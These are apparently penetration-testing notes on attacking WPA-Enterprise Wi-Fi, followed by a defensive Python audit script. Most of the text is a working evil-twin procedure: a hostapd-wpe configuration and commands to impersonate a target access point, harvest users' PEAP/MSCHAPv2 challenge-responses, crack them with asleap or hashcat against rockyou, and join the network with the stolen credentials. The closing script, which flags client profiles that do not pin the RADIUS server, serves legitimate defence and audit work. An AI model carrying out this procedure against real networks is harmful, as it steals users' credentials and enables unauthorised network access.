WPA-Enterprise (hostapd-wpe)
Capture the access point's certificate first using monitor mode:
open the capture in Wireshark, then filter on the certificate with:
tls.handshake.certificate
sudo airmon-ng check kill
Make sure you know the target SSID; this technique is essentially an Evil-Twin attack against the target Wi-Fi access point.
Edit the configuration file /etc/hostapd-wpe/hostapd-wpe.conf:
# Configuration file for hostapd-wpe
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1
# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh
# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]
Run the Evil Twin:
sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
After the victim enters a username and password:

Or check the log:
cat /var/log/hostapd-wpe.log
Then crack the captured challenge/response with rockyou.txt:
asleap -C <Challenge> -R <Response> -W /usr/share/wordlist/rockyou.txt
Alternatively, use hashcat (mode 5500) on the captured hash:
hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlist/rockyou.txt
Reference:
https://wirelessdefence.co.uk/hostapd-wpe/
Once you have the username and password, connect from the terminal:
Create the wpa_supplicant config file connect_wpa-e.conf:
network={
scan_ssid=1
eap=PEAP
ssid="<TARGET-NAME>"
key_mgmt=WPA-EAP
identity="<DOMAIN\USERNAME>"
password="<PASSWORD>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Then connect with wpa_supplicant:
sudo wpa_supplicant -B -i wlan0 -c ./connect_wpa-e.conf
Obtain an IP address:
sudo dhclient wlan0
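The client profile above never pins the RADIUS server (no ca_cert, no domain_suffix_match), so PEAP phase 1 completes against any certificate, which is exactly why the evil twin above harvests credentials. As an added example that is not part of these notes, a small Python audit script that parses wpa_supplicant network blocks in that format and flags the unpinned ones; the SSID, identity, CA path and RADIUS hostname are constructed placeholders:

```python
# Audit wpa_supplicant network blocks for tunnelled-EAP profiles that do not pin
# the RADIUS server: without ca_cert plus a server-name match, PEAP phase 1 completes
# against any certificate, which is what the evil twin relies on. SAMPLE_CONF is a
# constructed sample: block 1 mirrors the profile on this page, block 2 is hardened.
import re

SAMPLE_CONF = """
network={
eap=PEAP
ssid="CorpWiFi"
key_mgmt=WPA-EAP
identity="CORP\\alice"
phase2="auth=MSCHAPV2"
}
network={
eap=PEAP
ssid="CorpWiFi"
key_mgmt=WPA-EAP
identity="CORP\\alice"
ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
domain_suffix_match="radius.corp.example"
phase2="auth=MSCHAPV2"
}
"""
TUNNELED_EAP = {"PEAP", "TTLS"}
NAME_KEYS = ("domain_suffix_match", "domain_match", "altsubject_match")

def parse_networks(conf_text):
    """One dict per network={...} block, key -> value with quotes stripped."""
    blocks = []
    for body in re.findall(r"network=\{(.*?)\}", conf_text, re.S):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if line and not line.startswith("#") and "=" in line:
                key, _, value = line.partition("=")
                entry[key.strip()] = value.strip().strip('"')
        blocks.append(entry)
    return blocks

def audit_network(net):
    """Findings for one block; an empty list means the server is pinned."""
    if net.get("key_mgmt") != "WPA-EAP" or net.get("eap", "").upper() not in TUNNELED_EAP:
        return []  # not a tunnelled 802.1X profile; nothing to check here
    findings = []
    if "ca_cert" not in net and "ca_path" not in net:
        findings.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(k in net for k in NAME_KEYS):
        findings.append("no server-name match: any certificate from that CA is accepted")
    return findings
```

Run it over a real /etc/wpa_supplicant/wpa_supplicant.conf with `[audit_network(n) for n in parse_networks(open(path).read())]`; any non-empty list is a profile that would happily authenticate to a rogue AP.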